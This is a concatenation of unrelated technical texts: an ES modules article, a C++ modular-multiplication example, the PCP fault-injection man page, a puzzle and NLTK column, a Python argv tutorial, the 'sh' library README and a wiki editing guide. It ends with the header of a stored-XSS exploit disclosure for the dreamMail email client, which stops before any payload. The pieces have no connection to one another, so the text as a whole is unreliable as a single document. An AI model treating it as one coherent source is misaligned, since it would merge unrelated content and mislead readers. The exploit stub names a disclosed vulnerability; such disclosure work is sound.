I'm trying to write a Tic Tac Toe game but I'm stuck at the computer AI. Basically for the computer move I need a random generator to pick a number and insert it into a 2D array.
The parts that I'm stuck at is writing a code so that computer doesn't pick a number that has been taken either by player X or has been previously been picked by computer O. I've tried several different things but can't get anything to work. If you guys know of any solutions that would be of great help.
Here is what I got:
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <stdbool.h>

#define MAX_ROWS 3
#define MAX_COLS 3

// Function Declaration
void welcomeMsg ();
void printGrid (char grid[][MAX_COLS]);
void gridMove (char grid[][MAX_COLS]);

int main (void)
{
    // Local Declarations (most of these variables are just for testing; they are
    // not actually used by the program).
    char position, move;
    int rowOne, rowTwo, rowThree;
    int colmOne, colmTwo, colmThree;
    int diagOne, diagTwo;
    int row, colum;
    int randRow, randColum;
    int range, randNo;
    int index;
    char empty;
    int i, j;
    int availableSp = 9;

    srand ( time(NULL) );

    // 2D array Initialization
    char table[MAX_ROWS][MAX_COLS] = { {'1', '2', '3'},
                                       {'4', '5', '6'},
                                       {'7', '8', '9'} }; // table

    // This is just a function that prints a welcome message
    welcomeMsg(position);

    printf("Select X or O (X moves first)? ");
    scanf(" %c", &move);

    do
    {
        // Checks rows, columns, and diagonals for a winner.
        rowOne   = (table[0][0] == table[0][1] && table[0][0] == table[0][2]);
        rowTwo   = (table[1][0] == table[1][1] && table[1][0] == table[1][2]);
        rowThree = (table[2][0] == table[2][1] && table[2][0] == table[2][2]);
        colmOne   = (table[0][0] == table[1][0] && table[0][0] == table[2][0]);
        colmTwo   = (table[0][1] == table[1][1] && table[0][1] == table[2][1]);
        colmThree = (table[0][2] == table[1][2] && table[0][2] == table[2][2]);
        diagOne = (table[0][0] == table[1][1] && table[0][0] == table[2][2]);
        diagTwo = (table[0][2] == table[1][1] && table[0][2] == table[2][0]);

        if (rowOne || rowTwo || rowThree || colmOne || colmTwo ||
            colmThree || diagOne || diagTwo == 1)
            break;

        printGrid (table);

        // Player Move
        printf("Enter the number of an available space, you are X: ");
        scanf("%d", &index);
        row   = (index - 1) / 3;
        colum = (index - 1) % 3;
        table[row][colum] = 'X';
        availableSp--;

        // Computer Move, and this is the part that I'm stuck at.
        range = (availableSp - 1) + 1;
        randNo = rand() % range + 1;
        randRow   = (randNo - 1) / 3;
        randColum = (randNo - 1) % 3;
        if ((table[randRow][randColum] != 'X') &&
            (table[randRow][randColum] != 'O'))
        {
            table[randRow][randColum] = 'O';
        }
        availableSp--;
        printf("\nThe computer picked space %d\n", randNo);
        printf("\n%d\n\n", availableSp);
    } while (availableSp > 0);

    if (rowOne || rowTwo || rowThree || colmOne || colmTwo ||
        colmThree || diagOne || diagTwo == 1)
        printf("You Won\n\n");

    printGrid (table);

    return 0;
} // main
Any help would be greatly appreciated.
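For reference, a common fix for this (not from the original thread; the function and variable names below are invented for illustration) is to collect the indices of all free cells first and then pick uniformly among them, so the computer can never land on a taken square and can never loop forever:

```c
#include <stdlib.h>

/* Pick a random free cell: gather the 1-based indices of every cell
   that is neither 'X' nor 'O', then choose one of them uniformly.
   Returns 0 if the board is full. */
int pickComputerMove(char table[3][3])
{
    int freeCells[9];
    int count = 0;
    for (int i = 0; i < 9; i++) {
        char c = table[i / 3][i % 3];
        if (c != 'X' && c != 'O')
            freeCells[count++] = i + 1;  /* same numbering as the grid labels */
    }
    if (count == 0)
        return 0;                        /* no moves left */
    return freeCells[rand() % count];
}
```

The caller would then mark the board exactly as the existing player-move code does: `table[(move - 1) / 3][(move - 1) % 3] = 'O';`.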
Commenter
Myron A. Semack
asks
how much faster Windows would be if you took out the backward compatibility
stuff.
Myron is so anxious about this that he
asked the question a second time.
Asking a question twice typically counts as a reason
not to answer it, but since I had already written up the answer,
I figured I'd post it anyway.
Oh great,
and now he asked it a third time.
Myron is so lucky I already wrote up the answer,
because if I hadn't I would've just skipped the topic altogether.
I don't respond well to nagging.
The answer is, "Not much, really."
Because the real cost of compatibility is not in the hacks.
The hacks are small potatoes.
Most hacks are just a few lines of code
(sometimes as few as zero),
so the impact on performance is fairly low.
Consider
a compatibility hack for programs that mess up
IUnknown::QueryInterface:
...
ITargetInterface *pti = NULL;
HRESULT hr = pobj->QueryInterface(
IID_ITargetInterface, (void**)&pti);
if (SUCCEEDED(hr) && !pti) hr = E_FAIL;
The compatibility hack here was just two lines of code.
One to set the pti variable to NULL
and another to check for a common application error and work around it.
The incremental cost of this is negligible.
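The failure mode being defended against is easy to mimic without COM (a sketch; BrokenQueryInterface and SafeQuery are invented stand-ins, not real Windows APIs): the callee reports success but never writes its out-parameter, and only the two extra lines save the caller.

```c
#include <stddef.h>

/* Stand-in for a buggy component: reports success (0) but forgets to
   write the out-parameter, like the misbehaving QueryInterface
   implementations the hack guards against. */
static int BrokenQueryInterface(void **out)
{
    (void)out;          /* bug: *out is never assigned */
    return 0;           /* "S_OK" */
}

/* Caller-side compatibility check: treat "success with a NULL result"
   as failure instead of handing back a bogus pointer. */
int SafeQuery(void **out)
{
    *out = NULL;                       /* line 1 of the hack */
    int hr = BrokenQueryInterface(out);
    if (hr == 0 && *out == NULL)       /* line 2 of the hack */
        hr = -1;                       /* "E_FAIL" */
    return hr;
}
```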
Here's an example of a hack that takes zero lines of code:
HINSTANCE ShellExecute(...)
{
...
return (HINSTANCE)42;
}
I count this as zero lines of code because the function has to return
something.
You may as well return a carefully-crafted value chosen for compatibility.
The incremental cost of this is zero.
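The value 42 is not arbitrary-looking by accident: ShellExecute's documented convention is that return values greater than 32 mean success, while values of 32 or less are error codes. A caller written against that convention (sketched below; the helper function is invented) still sees success:

```c
/* Old-style ShellExecute success check, per the documented convention:
   return values <= 32 are error codes, anything above 32 is success,
   so a hard-coded 42 keeps legacy callers happy. */
int launchSucceeded(long result)
{
    return result > 32;
}
```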
No, the real cost of compatibility is in the design.
If you're going to design a feature that enhances the window manager
in some way,
you have to think about how existing
programs are going to react to your feature.
These are programs that predate your feature and naturally know nothing
about it.
Does your feature alter the message order?
Does it introduce a new point of re-entrancy?
Does it cause a function to begin dispatching messages
that previously did not?
You may be forced to design your feature differently in order to
accommodate these concerns.
These issues aren't things you can "take out";
they are inherently part of the feature design.
Consider for example color NTSC.
(Videophiles like to say that NTSC stands for "never twice the same color.")
The NTSC color model is backward compatible with the existing system
for black-and-white television.
How much cheaper would your color television be if you could take out
the backward compatibility circuitry?
That question misses the point.
The backward compatibility is in the design of the NTSC color signal.
It's not a circuit board
(or, to be more historically accurate, a set of vacuum tubes)
that you can pull out.
You can't "take out" the compatibility stuff from your television set.
The compatibility is fundamentally part of the way the NTSC color
signal works.
I wouldn't consider good error checking to be backwards compatibility hacks.
But, how different would Windows be if it didn't have to take backwards compatibility for undocumented behaviour into consideration when improving features? Well, I guess it'd partially be Windows x64 which could have tossed most backwards compatibility hacks if the app was 64-bit since obviously those apps don't need backwards compatibility with anything.
So what is it exactly about Vista that is making life harder for people?
Let's ignore for the moment that people just might not get it. You've said many times, when people have problems, they blame the OS.
My basic theory is that since Vista pushes the "standard user" login, many applications that are still writing to Program Files and HKLM are broken, and were always broken (people just ran as admin) and it's easy to just blame Vista. Games are notorious for "requiring Admin privileges" to cover up for lazy developers. You can even see this requirement on the box of some of the top-selling games of all time.
Is this just that particular competitors made enough funny but inaccurate commercials? After all, I made zero upgrades, haven't seen a UAC prompt for ages, and still use all of my peripherals but one from a nasty vendor who has simply decided to drop support.
Another cost of the backward compatibility hacks is that they hide bugs, making it much harder to find them. Defensive code is great, but not in your debug builds.
If my QueryInterface is messed up, it may be because of a deeper problem. Fixing up the HRESULT may mask the problem, reducing the chance it'll get noticed or extending the time it takes to diagnose it.
Are there debug versions of core system DLLs (kernel, user, gdi, etc.) that developers can use while debugging? It would be cool if you could enable something assertion-like that would notify developers every time a compatibility hack saved their butts.
Raymond, no, it's about enforcing the documentation. The app developer is going to have to recompile their application for x64 anywho, why not take the opportunity to make it better? I mean, I thought the SDL features were also about making things more secure, which may mean old hacks didn't work.
And I'm not sure I understand, if you go x64 on windows, a lot of features are automatically enabled by default (especially security ones). They're disabled by default (like DEP in IE7) on 32-bit due to backwards compatibility issues.
@CGomez: If Windows Vista's UAC is enabled, and an application is run which doesn't have a requestedExecutionLevel in its manifest (or no manifest at all), file system and registry redirection kick in. These redirect writes to some per-machine areas of the file system (e.g. Program Files, Windows) and the registry (e.g. HKLM\Software) to separate per-user stores. In Windows Explorer, you get a Show Compatibility Files button if there's a corresponding redirect folder for the current folder.
If UAC is disabled the ACLs are processed and an Access Denied error may be generated.
If a UAC-compatible manifest is present which sets a requestedExecutionLevel (asInvoker, highestAvailable, requireAdministrator) then, if the user allows the program to run (if highestAvailable or requireAdministrator), the redirects do not occur - you are expected to have fixed your program. As such you'll get Access Denied if you try to write to privileged locations (and you've not changed the default ACLs).
UAC isn't actually that hard to understand for a developer.
Don't forget the cost to any newcomer when learning the API, since old API concepts, calls, argument types, and result types linger around long after they are obsolete. To understand such an "organically grown" API, you effectively have to understand many of the preceding versions, even if they are totally irrelevant today.
Oh, and the technical reason is that the colour part of the NTSC signal only carries so-called 'chroma' information. This has the useful additional effect of generally reducing the bandwidth required for the chroma signal.
PAL works much the same except that the phase of the chroma signal is inverted for each line compared to the previous one (hence Phase Alternating Line) to reduce the effect of noise. The French SECAM system has a compatible mono signal but encodes the colour differently, so UK receivers, if able to pick up a signal, could traditionally only see a monochrome picture (nowadays European receivers are multistandard and can decode and display PAL-60 and SECAM on their analogue tuners).
Similarly in FM stereo radio, the compatible mono signal is treated as Left + Right, while the 'stereo' subcarrier carries the differences between left and right (Left - Right). To get 'left' you sum the two signals (L+R + L-R = 2L), while to get 'right' you invert the stereo signal and sum (L+R + -(L-R) = L+R + -L + R = 2R).
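The sum-and-difference arithmetic above is easy to check numerically (a sketch; the "signals" here are just single sample values):

```c
/* Recover left and right channels from the compatible mono signal
   (L + R) and the stereo subcarrier (L - R), per the algebra above.
   The factor of 2 is removed by the final division. */
void decodeStereo(double mono, double diff, double *left, double *right)
{
    *left  = (mono + diff) / 2.0;   /* ((L+R) + (L-R)) / 2 = L */
    *right = (mono - diff) / 2.0;   /* ((L+R) - (L-R)) / 2 = R */
}
```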
<OT>One would think that a person who "specializes in the development of low-level software for mission-cricial ... systems" and a student of education could spell- and grammar-check their web presence before getting persnickety with others. Sorry, this adds nothing but I couldn't help myself.
The kind of compatibility hacks that can be removed in Win64 include a few major categories:
1. Things that were required for 16-bit; since 16-bit apps cannot run on a CPU in 64-bit mode, anything required strictly for 16-bit apps can be removed.
2. Things that require code to be rewritten; for example anything that generates code will need a 64-bit code generator, so obviously disabling DEP on the generated code can be part of it, thus DEP can be enabled by default. There are many 32-bit programs that generate code (JITters) or have self-modifying code which would break if DEP were on by default.
3. Things that require a recompile; for example it's impossible to make a 32-bit driver work on Win64, so at the very least it will have to be recompiled. As long as it can be recompiled, it can be signed, so signed drivers can be made a requirement on Win64.
Once upon a time while debugging a nasty localization bug, my coworker and I had to look at the source for the Windows edit control. I wear that emotional scar to this day.
In addition to the Debug Builds of various Windows binaries, there is a nice tool called the application verifier (). Some of us (in networking at least) are thinking of adding more rules to that for pointing out to developers that they are using an API incorrectly, but taking advantage of the existing set of warnings it generates is a good thing.
-- Ari
Nitpicking the comments now...I've sunk to a new low...
Sorry, this isn't correct (and assuming there's anyone reading who really wanted to know the scoop on NTSC and its backwards compatibility...)
The original broadcast TV signal in the US was a simple DC voltage level, with some special timing characteristics. The level was used to drive the intensity of the (one) electron gun in early TVs, producing the fabled black-and-white TV signal.
When color TV was introduced, the NTSC wanted to be able to transmit color TV signals that would still work on older B&W TVs. That meant that any changes to the signal format to include color information had to be designed such that an older TV would produce a reasonable B&W picture. Introducing a "breaking change" to the signal would have cut out about 95% of the TV market.
They came up with a remarkably clever scheme. They divided the color signal into three parts: the "Luma" (luminosity, the brightness of the picture), the "Chroma Hue" (the particular color of the picture) and the "Chroma Saturation" (how intense the color was). The Luma signal was the same as the old broadcast signal, so older TVs would see this as their entire picture. The Chroma Hue was encoded as a high-frequency "rider" on the Luma, with its frequency fixed (at 3.58MHz) and its amplitude encoding the Chroma Saturation. The Chroma signal frequency was synchronized (in the days before PLLs and highly-accurate oscillators) to a "color burst" repeated regularly in the signal.
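In modern terms, that Luma signal is a weighted sum of the red, green and blue components; the weights below are the standard NTSC/BT.601 luma coefficients (a sketch of just this one piece of the pipeline):

```c
/* NTSC luma: Y = 0.299 R + 0.587 G + 0.114 B.
   A black-and-white set effectively displays only this value, which is
   why a colour broadcast still produced a sensible monochrome picture. */
double luma(double r, double g, double b)
{
    return 0.299 * r + 0.587 * g + 0.114 * b;
}
```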
I'm an old hand at NTSC signals, and I still think the engineering solution was stunningly elegant for its time. For more information (than you ever wanted), check Wikipedia [].
And now there's a "breaking change": the ATSC broadcast standard, which is a digital encoding, provides multiple aspect ratios, resolutions, and compression parameters...and is hardly used at all.
@Mike Dimmick;
I never thought UAC was difficult for a developer. I'm just positing why there is all this negative press on Vista not being compatible with anything. Every review or "reputable" magazine out there says "Make sure all your hardware and software works, and be prepared to buy new."
This is said every time there is an OS release, but for some reason this time it seems to really be resonating. Reasonable developers that I know are saying "Oh, Vista is crap... just a pretty interface over XP."
Back to the point. With everything Raymond espouses about MSFT taking great pains to ensure backward compatibility, why is there such a negative view of Vista? I mean, assuming that many people at MSFT share the view that breaking changes just make users grumpy, there shouldn't be many problems?
And I shared my example to show just how few problems I've had. One to be exact... vendor's fault.
Perhaps what people need to understand better is that a major Windows design point is backwards compatibility. Pretend that the MS developers are told that this is job #1. Easy to understand decisions now ... and since performance is a close #2, it is great that it performs as well as it does, and I am glad that my kids crappy games still run. Saves me $$ ... so WINDOWS SAVES ME MONEY.
The backwards compatibility entries remind me of DOS and 16-bit Windows applications that would work fine in Windows '95, but would fail in NT and OS/2.
The operating system was simply enforcing boundaries the application was crossing. But the blame was squarely placed on the platform.
I also remember the old Parity Check error screen, sort of a Blue Screen of Death in those good old DOS days. The memory system was preventing use with a known hardware problem that would eventually corrupt data. Many folks flipped the non-parity switch to "avoid" the issue. Yes it was rotten when you lost that spreadsheet, but it was worse when hard disk FAT became scrambled.
Raymond,
For what it's worth, I honestly wasn't trying to nag you. I’m sorry if it came across that way.
Post #1: I asked the question in a blog comment. I had forgotten that your blog has a Suggestion Box. I screwed up.
Post #2: I said to myself, "Oops, I should have put the question in the Suggestion Box". So, I re-posted it there. I figured that if I didn't post the question in the Suggestion Box, it wouldn't get answered. I was trying to fix my mistake.
Post #3: I was actually responding to one of the other people who were posting comments. I was trying to explain my question and the reasoning behind it. Post #3 wasn't directed at you.
So, actually, I only asked you the question twice, not three times. :-) And I only asked it twice because I made a mistake about where I posted it the first time.
Coming at it from further out, NT was an upgrade; Win95 was a compatibility hack. As were Win98 and Millennium. Not entirely true, but not entirely false, as fleets of 3.1 applications took liberties with the underlying 16-bit USER.EXE architecture. Win95 programs were slowed by this, as lots of core calls were serialized. For clean-and-fast, run NT!
In my opinion backwards compatibility is a non-issue. Suppose an application is designed and tested for Windows 2000. When Windows XP or Vista came out, it should not be assumed to work for those platforms. Rather, appropriate porting and testing needs to be done first.
When .Net 1.0 initially came out, it appeared that the versioning features would actually work like this. So if an application targeting .Net version 1.0 was developed, it would execute under 1.0 even if 1.1, 2.0, 3.0 etc co-existed. This gave me so much hope that .Net could make a clean break from backward compatibility and actually fix the real problems instead of just supplementing them.
However, in reality nothing has changed. People want their old code to work unported and untested on new platforms and new versions. So old broken code remains and new, fixed functions are added.
As a developer, it's a little depressing sometimes.
"As a developer, it's a little depressing sometimes."
As a developer, I love it. I hate being called back to work on old projects to port them to new systems. BORING.
J,
That is a rather irresponsible attitude. Even with assumed backward compatibility, you need to at least verify that your application still functions appropriately on a new version and platform. Depending on the results, some porting may be necessary.
I don't think NTSC is a good example of cheap compatibility; it wasn't (and isn't) cheap at all; the compatibility "circuit" is everything involved in YUV.
The only reason the YUV colour-space exists at all is because original B&W is roughly what we now consider the "luminance value". Every CRT/LCD television can display only 3 colours; Red, Green and Blue. YUV doesn't map into that colour-space except by a massive loss of precision (RGB555 usually goes to 11.5 bits).
It requires special conversion circuits and sometimes multiple conversion passes. There is utter madness going on inside MPEG-2/4 set-top-boxes because of this compatibility.
BTW; PAL has the same problem.
Well Raymond, you've pointed out that compatibility hacks don't put such a high penalty on performance, since, and I quote, the "real cost of compatibility is in the design".
So logically the question should be rephrased as: how much "better designed" Windows would be if you took out the backward compatibility stuff?
And the answer is?
Raptor
> And the answer is?
The answer is totally irrelevant because nobody would be using it. You can have the most elegant design in the world, but what's the point if nobody wants to use it?
> And now there's a "breaking change": the ATSC broadcast standard, which is a digital encoding, provides multiple aspect ratios, resolutions, and compression parameters...and is hardly used at all.
Maybe you meant not used as much, considering TVs that have ATSC decoders only tend to be a few years old, and stations broadcasting in ATSC really came online the past few years?
Fact is, people have noticed that their cable and satellite TV of local channels looks worse than their ATSC counterparts. Cable and satellite compress the heck out of their HDTV signals, while ATSC tends to have few others sharing subchannels, thus leaving plenty of bandwidth for the signal. One regular channel on cable can easily host 4-16 channels using digital cable - 64-128 channels for music. If your TV supports QAM, do a channel scan - even encrypted channels will cause it to lock, but it won't decode.
The recent resurgence in the humble UHF loop antenna is proof - this time, people who want the best picture and sound ditch their cable/satellite locals, and use the OTA versions. Which is why satellite receivers and the Series3 TiVo have not only their regular cable/satellite input, but also ATSC.
Dean Harding,
Please speak for yourself. I for one would use it and welcome it. I am tired of all of the "compatibility hacks". As a developer I spend more time reading documentation for all of the technical limitations, workarounds, and "gotchas" to poorly designed functions than actually writing code. .Net 1.0 was a huge improvement. However, with future versions it's just a repeat performance.
Backward compatibility is not necessary and only gives developers a false sense of security. Assuming that a product developed for a specific platform and version will automatically work untested and unmodified on a future unknown platform and version is irresponsible and unrealistic. Even with the current backward compatibility, a certain level of testing is still required and some changes are occasionally needed.
Craig: I'm sure TV manufacturers bemoan the fact that NTSC had to be backwards compatible with B&W, too...
I wonder if lessons learned with past APIs cause Microsoft platform developers to write their API functions a lot more defensively than those of the early days?
I've been burned by similar things (on a much smaller scale!) myself, and I've learned that callers will take any liberty they can get away with, so it's best to make them crash and burn rather than silently fixing their stuff. Obviously old functions can't crash and burn like this, but new functions can.
I wonder if the .NET Framework wasn't intended in part to solve this problem. "Managed code" is by definition a lot more rigid and "un-abusable" than the native code functions of the Windows API.
Nobody correctly nitpicked the NTSC example:
The color frame rate of NTSC is 29.97 fps (interlaced) due to a very complicated choice of color carrier frequencies in order to prevent distortion to black and white TVs (the luma carrier in general). It involved several years of work by the Rand corporation and has prime numbers and common denominators.
The fact that the frame rate was dropped .03 fps meant the power supply could no longer be synchronized to AC power. This greatly complicates the high voltage power supply design of CRT televisions to this day.
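For the curious, the 29.97 figure falls out of the standard NTSC timing relations (a sketch, not from the comment itself: the colour subcarrier is exactly 315/88 MHz, the line rate is 2/455 of the subcarrier, and there are 525 lines per frame):

```c
/* NTSC timing relations: the ~3.579545 MHz colour subcarrier is an odd
   multiple (455/2) of the line rate, and there are 525 lines per frame,
   which forces the frame rate down from 30 to roughly 29.97 fps. */
double ntscFrameRate(void)
{
    double subcarrier = 315e6 / 88.0;              /* exactly 3579545.45... Hz */
    double lineRate   = subcarrier * 2.0 / 455.0;  /* ~15734.27 Hz */
    return lineRate / 525.0;                       /* ~29.97 frames/s */
}
```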
PAL is 25 FPS even, but due to the large number of countries and their compatibility issues there's an amazing number of variants (PAL-A thru N + K')
"Backward compatibility is not necessary and only gives developers a false sense of security."
Backward compatibility is necessary for Microsoft's bottom line!
Since the hacks are so small, why is the AppPatch directory on Windows XP almost 5 MB?
i think godwin's law is going to need to be supplemented with 'mikeys law of windows' which says: 'As an online discussion grows longer, the probability of a comparison involving UAC approaches one.'
@ craig. you are pretty cute and naive. it will be nice to see you on the other side of the 'newbie to commercial compatibility' phase.
basically, you need to realise that ms is satisfying corporate need here. they don't neccessarily write the programs they are using. but they want them on the new os anyway. if it doesn't work, they won't upgrade. and ms does not earn money. the simple answer? make them work. if it takes compat hacks, then so be it. at least the windows continues to be commercially viable, and while it's viable we can add NEW things and GOOD things, while keeping the big paying customers on board.
the blog would be a much quieter place if people understood this, and similar, concepts :)
i, as a developer, am very happy and often impressed with ms' compat implementations and stories.
"That is a rather irresponsible attitude. Even with assumed backward compatibility, you need to at least verify that your application still functions appropriately on a new version and platform."
No I don't. That's what we pay our testers for. If no issues appear, then I don't do anything.
mikey,
With over 30 years of experience in software development, I am hardly a "newbie" anymore.
I fully realize why backward compatibility exists. However, developers constantly abuse it: assuming that their application targeting a specific platform and version will magically work on future versions without any testing (and needed porting). I have seen countless applications fail due to this.
If you're at a large enough company there will often be testers. However, at many smaller places, developers are the testers. And developers usually do not want to test (not talking about unit tests).
I agree with Alan and Craig.
Each new release of the API and framework gets uglier, dirtier, and complicated. The broken functions and types are fairly fixed (backward compatibility) while new ones are made to replace them.
I was much more productive with older versions of the Windows API than I am now. Perhaps the most productive I have ever been was with the initial version of the .Net Framework. However, since 1.1 and especially 2.0, it is taking more time to sift through the compatibility "trash".
While I would like to always write perfect code, I do make mistakes. When this happens, I would hope that my application would fail so that I can fix it. However, all too often internal hacks hide the problem.
That is not to say that I do not appreciate the newer functionality. However, I would like the trash that it replaces to be removed. It will not break my app because when I developed it it was for a specific version which will not change.
The trash continues to grow, but no one is willing to take it out.
One person's trash is another person's treasure.
You can bet that there are multi-billion-dollar corporations with internal tools that rely heavily on that trash.
As a customer, I'll be sad if the manufacturer no longer maintains the code.
Consider CompanyA's multi-port modem boards. They include drivers for Win2k but the driver software does not work on WinXP or above. The company was later bought by CompanyB, and they refuse to provide free software updates for original CompanyA customers. An additional HKD$5000 must be paid for the new driver software bundle. That's the exact reason why we still have one Win2k server that has not been upgraded to Win2003.
It's sad that both CompanyA and CompanyB are large and famous ones.
Cheong,
Sounds to me like the customer got what they paid for: drivers designed and tested for Windows 2000. Why would you expect them to magically work on another platform? Even _if_ they did work on Windows XP or 2003, that is only by chance and is not something that you can rely on without proper testing and verification. Same with other versions. There are a great many applications (especially games) designed for XP that will not run properly under Vista. Backward compatibility did not help as much as thought.
[In other words, you want to make it harder for people to port their
programs to 64-bit Windows. "I have this program that works just fine
on 32-bit Windows, but it crashes randomly on 64-bit Windows. 64-bit
Windows is so buggy." -Raymond]
So, all the 16-bit hacks were faithfully reproduced in 32-bit and now in 64-bit?
> So, all the 16-bit hacks were faithfully reproduced in 32-bit and now in 64-bit?
Wow, you're so smart for showing up Raymond like that! Please give your full name and address and I'll send you a medal.
So each time new Windows (k + n) version comes out we should buy all our peripherals over and over again?
> So each time new Windows (k + n) version comes out we should buy all our peripherals over and over again?
No, clearly not, but we should keep in mind that it isn't only Microsoft's responsibility to make sure that the hardware still works flawlessly; in a perfect world, the hardware companies would provide driver updates for every piece of hardware that is still in use by their customers. Same goes for software that relies on the APIs provided by Microsoft.
Clearly, the real world isn't perfect, so Microsoft adds enough hacks so that most of the old hard- and software works with newer OS versions, because otherwise, nobody (=not enough people to make it a success) would use the new OS.
So basically, MS has not much of a choice, so it would be a bit unfair if we blamed developers like Raymond for slowing down the OS due to compatibility hacks, OK?
Also, I think the application and hardware developers don't always have much of a choice either, because I wrote "... the hardware companies would provide driver updates to every piece of hardware that is still in use by the customers ..." - and that can be a long time. Sometimes, hard- and software is still in use that hasn't been sold for many years. So it would be damn expensive to still provide updates.
And the customers also don't have that much of a choice, because buying a completely new system every few years can be just too expensive, so old hard- and software is sometimes used as long as possible.
Seems as if nobody really has much of a choice ... | http://blogs.msdn.com/oldnewthing/archive/2007/07/23/4003873.aspx | crawl-002 | refinedweb | 4,796 | 64.2 |
Is it possible to run a post function which creates a subtask and copies all attachments from the parent issue to the subtask; with the obvious restriction that everything is done via the REST APIs? Editmeta for an issue shows that the attachments key has no operations; and that leaves this as the only method for attachment addition.
I found this answer () but it relies on copying the file to disk temporarily. I'm assuming that the ScriptRunner Cloud containers do not allow you to do this; or that it would be unreliable for larger files given the 30sec timeout.
The ideal way would be to simply add attachment IDs from Issue A to Subtask B, but I get the feeling each Issue needs its own copy of an attachment.
Edit: Fixed link
You should be able to clone attachments using the following code in a post function:
import org.apache.http.entity.ContentType;

def createReq = Unirest.post("/rest/api/2/issue")
        .header("Content-Type", "application/json")
        .body([
            summary: "Cloned issue"
        ])
        .asObject(Map)

assert createReq.status >= 200 && createReq.status < 300

def clonedIssue = createReq.body

// copy attachments
if (issue.fields.attachment) {
    issue.fields.attachment.collect { attachment ->
        def url = attachment.content as String
        url = url.substring(url.indexOf("/secure"))
        def fileBody = Unirest.get("${url}").asBinary().body
        def resp = Unirest.post("/rest/api/2/issue/${clonedIssue.id}/attachments")
                .header("X-Atlassian-Token", "no-check")
                .field("file", fileBody, ContentType.create(attachment['mimeType'] as String), attachment['filename'] as String)
                .asObject(List)
        assert resp.status >= 200 && resp.status < 300
    }
}
EDIT: added package import and other code fixes from comments below
Hi @Jon Bevan [Adaptavist], I've tried your code in a post-function on a transition, but I get an error on this line:
def fileBody = Unirest.get("${url}").asBinary().body
GET request to[] returned an error code: status: 403 - Forbidden
body: {"error": "Add-on 'com.onresolve.jira.groovy.groovyrunner' blocked from impersonating the user because the access token does not have the required scope(s)"}
It is running as 'Initiating user'. I also tried running it as the add-on user, but then it gives me an error code: status: 401 - Unauthorized.
Do you have any idea how to resolve this?
Thanks
Hi Rudy,
The 401 Unauthorized gives me the impression that the Initiating user might not have permission to view the attachment (or perhaps the issue it's attached to).
Thanks, Jon
I'm running it as myself and when I directly go to in my browser the logo loads. So I don't think I have a permission issue from that perspective.
Any other thoughts?
Hi @Jon Bevan [Adaptavist],
I've got rid of the 401 error by adding the add-on user to the correct project role.
Unfortunately it still does not work.
I get a compile error on ContentType.create(attachment.mimeType) because it is not declared. When I try to import the class with:
import groovyx.net.http.ContentType
ScriptRunner cannot resolve the class.
What am I missing here?
Thanks,
Rudy
Ok, I found out that it was not the correct library to import.
For future reference use:
import org.apache.http.entity.ContentType;
And casting to String will also help:
.field("file", fileBody, ContentType.create(attachment['mimeType'] as String), attachment['filename'] as String)
Ciao and thanks Jon for pointing me in the right direction.
Glad you got it working Rudy, and thanks for the correct import - I've updated the code above to reflect your fixes
> The ideal way would be to simply add attachment IDs from Issue A to Subtask B, but I get the feeling each Issue needs its own copy of an attachment
You have the right feeling. Each issue needs its own copy of the attachment.
> Is it possible to run a post function... with the obvious restriction that everything is done via the REST APIs
Calling the REST API from the post-function looks strange to me. Once you are coding the post-function, it's better to rely on the JIRA Java API.
Missed the script-runner tag. Apologies. Please refer to Jamie's comment.
It should certainly be possible from the perspective of whether the rest apis can do it. I'm not sure if you can write to local disk to be honest, but anyway, you should be able to stream the output of one call to the input of another. Or just hold the entire attachment file in memory. @Jon Mort (Adaptavist) - any ideas?
Holding in memory was my initial idea, but I worry about failure when the Script times out if we are looking at larger files (not likely in my use case, but I figure make this a relevant question for people who come back to this question with bigger files)
Also, doesn't the blocking aspect of the HTTP calls prevent you directly streaming from one input call to an output? I would have thought that you would need to do:
Input-A starts=>block execution=>read all the attachments to file/memory=>Input-A Closes
and then
Output-B starts=>block execution=>write all data to stream=>Output-B.
In this Python Tkinter tutorial, we will learn how to set background to be an image in Python Tkinter.
Set Background to be an Image in Python Tkinter
- There is more than one way to add a background image, but one thing is common to all of them: we use the Label widget to set the background.
- The simplest way to do this is to add a background image using PhotoImage() and place other widgets using Place geometry manager.
- Place geometry manager allows users to put the widget anywhere on the screen by providing x & y coordinates. You can even overlap the widgets by providing the same coordinates.
- PhotoImage() takes a file path as an argument and can be used later in the code to display images: PhotoImage(file='image_path.png')
- The only drawback of using PhotoImage is that it works only with PNG images.
- In case you want to use other formats, like JPEG, you can use the Pillow library.
- Use the command pip install pillow to install this library.
Code:
In this code, we have added a background image to the Python application. Other widgets like Text and button widgets are placed on the background image.
from tkinter import *

ws = Tk()
ws.title('PythonGuides')
ws.geometry('500x300')
ws.config(bg='yellow')

img = PhotoImage(file="python-tkinter-background-image.png")
label = Label(
    ws,
    image=img
)
label.place(x=0, y=0)

text = Text(
    ws,
    height=10,
    width=53
)
text.place(x=30, y=50)

button = Button(
    ws,
    text='SEND',
    relief=RAISED,
    font=('Arial Bold', 18)
)
button.place(x=190, y=250)

ws.mainloop()
Output:
This is simply a dummy email-sending mechanism, but it has a beautiful background image.
You may like the following Python Tkinter tutorials:
- Python tkinter label
- Python Tkinter Entry
- Python Tkinter Button
- Python Tkinter radiobutton
- Python Tkinter Checkbutton
- Python Tkinter Autocomplete
In this tutorial, we have learned how to set the background to be an image in Python Tkinter.
Introduction
ES modules have been a talking point in the JavaScript community for a long time. Their main goal is to bring official standardization of module systems to JavaScript. When something becomes a standard in JavaScript, there are two main steps involved. First, the spec has to be approved and finalized by ECMAScript, which has been done. Second, the browsers should start implementing it. This step is a bit time consuming and comes with all the hassles of backward compatibility.
The good news is there has been great progress on browser support for ES modules: all major browsers, including Edge, Chrome, Safari, and Firefox (60+), support them.
When it comes to modules, there have been several attempts to bring this functionality into the JavaScript world. For example:
- Node.js has implemented its own module system
- Bundlers and build tools such as Webpack, Babel, and Browserify integrated module usage
So with these efforts, a few module definitions have been implemented. The two lesser-used ones are:
- AMD (Asynchronous Module Definition)
- UMD (Universal Module Definition)
However, the leading ones are:
- CommonJS which is the Node.js implementation of module
- ES modules which is the native JavaScript’s standard for defining modules
There are a few things we will not be covering in this article:
- We will not focus on CommonJS except where it relates directly to ES modules. If you are interested in learning more about this module system, please read this article
- Even though there is support for ES modules on Node, our main focus for this article is on the usage of ES modules in browsers natively. If you are interested in learning more about ES modules support in Node, I suggest this official documentation, as well as this and this article
Why do we even need ES modules?
